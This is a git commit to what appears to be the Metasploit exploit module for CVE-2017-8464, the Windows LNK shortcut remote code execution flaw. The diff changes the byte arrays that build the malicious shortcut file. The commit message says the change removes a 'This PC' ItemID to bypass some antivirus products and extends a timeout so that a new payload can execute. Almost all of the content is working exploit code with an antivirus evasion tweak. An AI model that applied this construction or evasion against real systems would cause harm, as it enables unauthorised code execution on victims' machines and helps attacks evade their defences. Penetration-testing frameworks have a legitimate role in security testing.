Removed This PC ItemID & increased timeout in WaitForSingleObject

Remove the This PC ItemID to bypass (some) AV. Timeout for WaitForSingleObject is set to 2,5s. After this timeout a mutex is released allowed a new payload to be executed.
2017-07-27 20:14:50 +02:00 · 2017-07-27 20:14:50 +02:00 · 46ec04dd15
parent e6e94bad4b
commit 46ec04dd15
3 changed files with 2 additions and 9 deletions
--- a/data/exploits/cve-2017-8464/template_x64_windows.dll
+++ b/data/exploits/cve-2017-8464/template_x64_windows.dll
--- a/data/exploits/cve-2017-8464/template_x86_windows.dll
+++ b/data/exploits/cve-2017-8464/template_x86_windows.dll
--- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
+++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
@ -145,16 +145,9 @@ class MetasploitModule < Msf::Exploit::Remote
    idlist_data = ''
    # ItemID = ItemIDSize (2 bytes) + Data (variable)
    idlist_data << [0x12 + 2].pack('v')
-    idlist_data << [
-      # This PC
-      0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,
-      0x30, 0x9d
-    ].pack('C*')
-    # ItemID = ItemIDSize (2 bytes) + Data (variable)
-    idlist_data << [0x12 + 2].pack('v')
    idlist_data << [
      # All Control Panel Items
-      0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
+      0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
      0x30, 0x9d
    ].pack('C*')
    # ItemID = ItemIDSize (2 bytes) + Data (variable)
@ -172,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
      0x10, 0x00, 0x00, 0x00, # BlockSize
      0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
      0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
-      0x28, 0x00, 0x00, 0x00  # Offset in LinkTargetIDList
+      0x14, 0x00, 0x00, 0x00  # Offset in LinkTargetIDList
    ].pack('C*')
    # TerminalBlock
    ret << [0x00, 0x00, 0x00, 0x00].pack('V')